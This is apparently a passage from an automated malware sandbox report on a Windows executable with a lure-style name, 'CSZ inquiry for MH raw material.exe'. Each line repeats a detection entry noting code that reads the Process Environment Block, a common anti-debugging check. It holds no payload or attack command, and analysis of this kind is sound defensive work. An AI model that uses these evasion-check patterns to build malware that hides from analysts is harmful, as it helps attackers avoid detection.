              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E62000 mov eax, dword ptr fs:[00000030h]0_2_00E62000
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBA020 mov eax, dword ptr fs:[00000030h]0_2_00DBA020
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBC020 mov eax, dword ptr fs:[00000030h]0_2_00DBC020
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E961E5 mov eax, dword ptr fs:[00000030h]0_2_00E961E5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF01F8 mov eax, dword ptr fs:[00000030h]0_2_00DF01F8
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E861C3 mov eax, dword ptr fs:[00000030h]0_2_00E861C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E861C3 mov eax, dword ptr fs:[00000030h]0_2_00E861C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E1D0 mov eax, dword ptr fs:[00000030h]0_2_00E3E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E1D0 mov eax, dword ptr fs:[00000030h]0_2_00E3E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E1D0 mov ecx, dword ptr fs:[00000030h]0_2_00E3E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E1D0 mov eax, dword ptr fs:[00000030h]0_2_00E3E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E3E1D0 mov eax, dword ptr fs:[00000030h]0_2_00E3E1D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBA197 mov eax, dword ptr fs:[00000030h]0_2_00DBA197
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBA197 mov eax, dword ptr fs:[00000030h]0_2_00DBA197
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBA197 mov eax, dword ptr fs:[00000030h]0_2_00DBA197
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E00185 mov eax, dword ptr fs:[00000030h]0_2_00E00185
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E64180 mov eax, dword ptr fs:[00000030h]0_2_00E64180
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E64180 mov eax, dword ptr fs:[00000030h]0_2_00E64180
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7C188 mov eax, dword ptr fs:[00000030h]0_2_00E7C188
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7C188 mov eax, dword ptr fs:[00000030h]0_2_00E7C188
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4019F mov eax, dword ptr fs:[00000030h]0_2_00E4019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4019F mov eax, dword ptr fs:[00000030h]0_2_00E4019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4019F mov eax, dword ptr fs:[00000030h]0_2_00E4019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4019F mov eax, dword ptr fs:[00000030h]0_2_00E4019F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6154 mov eax, dword ptr fs:[00000030h]0_2_00DC6154
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6154 mov eax, dword ptr fs:[00000030h]0_2_00DC6154
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBC156 mov eax, dword ptr fs:[00000030h]0_2_00DBC156
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94164 mov eax, dword ptr fs:[00000030h]0_2_00E94164
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E94164 mov eax, dword ptr fs:[00000030h]0_2_00E94164
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E54144 mov eax, dword ptr fs:[00000030h]0_2_00E54144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E54144 mov eax, dword ptr fs:[00000030h]0_2_00E54144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E54144 mov ecx, dword ptr fs:[00000030h]0_2_00E54144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E54144 mov eax, dword ptr fs:[00000030h]0_2_00E54144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E54144 mov eax, dword ptr fs:[00000030h]0_2_00E54144
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E58158 mov eax, dword ptr fs:[00000030h]0_2_00E58158
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov eax, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov ecx, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov eax, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov eax, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov ecx, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov eax, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov eax, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov ecx, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov eax, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E10E mov ecx, dword ptr fs:[00000030h]0_2_00E6E10E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF0124 mov eax, dword ptr fs:[00000030h]0_2_00DF0124
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E80115 mov eax, dword ptr fs:[00000030h]0_2_00E80115
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6A118 mov ecx, dword ptr fs:[00000030h]0_2_00E6A118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6A118 mov eax, dword ptr fs:[00000030h]0_2_00E6A118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6A118 mov eax, dword ptr fs:[00000030h]0_2_00E6A118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6A118 mov eax, dword ptr fs:[00000030h]0_2_00E6A118
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA2C3 mov eax, dword ptr fs:[00000030h]0_2_00DCA2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA2C3 mov eax, dword ptr fs:[00000030h]0_2_00DCA2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA2C3 mov eax, dword ptr fs:[00000030h]0_2_00DCA2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA2C3 mov eax, dword ptr fs:[00000030h]0_2_00DCA2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA2C3 mov eax, dword ptr fs:[00000030h]0_2_00DCA2C3
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD02E1 mov eax, dword ptr fs:[00000030h]0_2_00DD02E1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD02E1 mov eax, dword ptr fs:[00000030h]0_2_00DD02E1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD02E1 mov eax, dword ptr fs:[00000030h]0_2_00DD02E1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E962D6 mov eax, dword ptr fs:[00000030h]0_2_00E962D6
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E562A0 mov eax, dword ptr fs:[00000030h]0_2_00E562A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E562A0 mov ecx, dword ptr fs:[00000030h]0_2_00E562A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E562A0 mov eax, dword ptr fs:[00000030h]0_2_00E562A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E562A0 mov eax, dword ptr fs:[00000030h]0_2_00E562A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E562A0 mov eax, dword ptr fs:[00000030h]0_2_00E562A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E562A0 mov eax, dword ptr fs:[00000030h]0_2_00E562A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE284 mov eax, dword ptr fs:[00000030h]0_2_00DFE284
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE284 mov eax, dword ptr fs:[00000030h]0_2_00DFE284
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E40283 mov eax, dword ptr fs:[00000030h]0_2_00E40283
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E40283 mov eax, dword ptr fs:[00000030h]0_2_00E40283
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E40283 mov eax, dword ptr fs:[00000030h]0_2_00E40283
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD02A0 mov eax, dword ptr fs:[00000030h]0_2_00DD02A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD02A0 mov eax, dword ptr fs:[00000030h]0_2_00DD02A0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC6259 mov eax, dword ptr fs:[00000030h]0_2_00DC6259
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBA250 mov eax, dword ptr fs:[00000030h]0_2_00DBA250
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E70274 mov eax, dword ptr fs:[00000030h]0_2_00E70274
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E48243 mov eax, dword ptr fs:[00000030h]0_2_00E48243
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E48243 mov ecx, dword ptr fs:[00000030h]0_2_00E48243
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB826B mov eax, dword ptr fs:[00000030h]0_2_00DB826B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E9625D mov eax, dword ptr fs:[00000030h]0_2_00E9625D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7A250 mov eax, dword ptr fs:[00000030h]0_2_00E7A250
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7A250 mov eax, dword ptr fs:[00000030h]0_2_00E7A250
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC4260 mov eax, dword ptr fs:[00000030h]0_2_00DC4260
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC4260 mov eax, dword ptr fs:[00000030h]0_2_00DC4260
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC4260 mov eax, dword ptr fs:[00000030h]0_2_00DC4260
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB823B mov eax, dword ptr fs:[00000030h]0_2_00DB823B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA3C0 mov eax, dword ptr fs:[00000030h]0_2_00DCA3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA3C0 mov eax, dword ptr fs:[00000030h]0_2_00DCA3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA3C0 mov eax, dword ptr fs:[00000030h]0_2_00DCA3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA3C0 mov eax, dword ptr fs:[00000030h]0_2_00DCA3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA3C0 mov eax, dword ptr fs:[00000030h]0_2_00DCA3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DCA3C0 mov eax, dword ptr fs:[00000030h]0_2_00DCA3C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC83C0 mov eax, dword ptr fs:[00000030h]0_2_00DC83C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC83C0 mov eax, dword ptr fs:[00000030h]0_2_00DC83C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC83C0 mov eax, dword ptr fs:[00000030h]0_2_00DC83C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC83C0 mov eax, dword ptr fs:[00000030h]0_2_00DC83C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF63FF mov eax, dword ptr fs:[00000030h]0_2_00DF63FF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E463C0 mov eax, dword ptr fs:[00000030h]0_2_00E463C0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7C3CD mov eax, dword ptr fs:[00000030h]0_2_00E7C3CD
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE3F0 mov eax, dword ptr fs:[00000030h]0_2_00DDE3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE3F0 mov eax, dword ptr fs:[00000030h]0_2_00DDE3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DDE3F0 mov eax, dword ptr fs:[00000030h]0_2_00DDE3F0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E643D4 mov eax, dword ptr fs:[00000030h]0_2_00E643D4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E643D4 mov eax, dword ptr fs:[00000030h]0_2_00E643D4
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DD03E9 mov eax, dword ptr fs:[00000030h]0_2_00DD03E9
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E3DB mov eax, dword ptr fs:[00000030h]0_2_00E6E3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E3DB mov eax, dword ptr fs:[00000030h]0_2_00E6E3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E3DB mov ecx, dword ptr fs:[00000030h]0_2_00E6E3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6E3DB mov eax, dword ptr fs:[00000030h]0_2_00E6E3DB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB8397 mov eax, dword ptr fs:[00000030h]0_2_00DB8397
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB8397 mov eax, dword ptr fs:[00000030h]0_2_00DB8397
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB8397 mov eax, dword ptr fs:[00000030h]0_2_00DB8397
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE438F mov eax, dword ptr fs:[00000030h]0_2_00DE438F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE438F mov eax, dword ptr fs:[00000030h]0_2_00DE438F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBE388 mov eax, dword ptr fs:[00000030h]0_2_00DBE388
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBE388 mov eax, dword ptr fs:[00000030h]0_2_00DBE388
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBE388 mov eax, dword ptr fs:[00000030h]0_2_00DBE388
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E6437C mov eax, dword ptr fs:[00000030h]0_2_00E6437C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E9634F mov eax, dword ptr fs:[00000030h]0_2_00E9634F
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E42349 mov eax, dword ptr fs:[00000030h]0_2_00E42349
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E68350 mov ecx, dword ptr fs:[00000030h]0_2_00E68350
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4035C mov eax, dword ptr fs:[00000030h]0_2_00E4035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4035C mov eax, dword ptr fs:[00000030h]0_2_00E4035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4035C mov eax, dword ptr fs:[00000030h]0_2_00E4035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4035C mov ecx, dword ptr fs:[00000030h]0_2_00E4035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4035C mov eax, dword ptr fs:[00000030h]0_2_00E4035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4035C mov eax, dword ptr fs:[00000030h]0_2_00E4035C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E8A352 mov eax, dword ptr fs:[00000030h]0_2_00E8A352
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DBC310 mov ecx, dword ptr fs:[00000030h]0_2_00DBC310
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E98324 mov eax, dword ptr fs:[00000030h]0_2_00E98324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E98324 mov ecx, dword ptr fs:[00000030h]0_2_00E98324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E98324 mov eax, dword ptr fs:[00000030h]0_2_00E98324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E98324 mov eax, dword ptr fs:[00000030h]0_2_00E98324
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE0310 mov ecx, dword ptr fs:[00000030h]0_2_00DE0310
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA30B mov eax, dword ptr fs:[00000030h]0_2_00DFA30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA30B mov eax, dword ptr fs:[00000030h]0_2_00DFA30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFA30B mov eax, dword ptr fs:[00000030h]0_2_00DFA30B
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC04E5 mov ecx, dword ptr fs:[00000030h]0_2_00DC04E5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4A4B0 mov eax, dword ptr fs:[00000030h]0_2_00E4A4B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DF44B0 mov ecx, dword ptr fs:[00000030h]0_2_00DF44B0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DC64AB mov eax, dword ptr fs:[00000030h]0_2_00DC64AB
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E7A49A mov eax, dword ptr fs:[00000030h]0_2_00E7A49A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DE245A mov eax, dword ptr fs:[00000030h]0_2_00DE245A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00E4C460 mov ecx, dword ptr fs:[00000030h]0_2_00E4C460
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DB645D mov eax, dword ptr fs:[00000030h]0_2_00DB645D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_00DFE443 mov eax, dword ptr fs:[00000030h]0_2_00DFE443
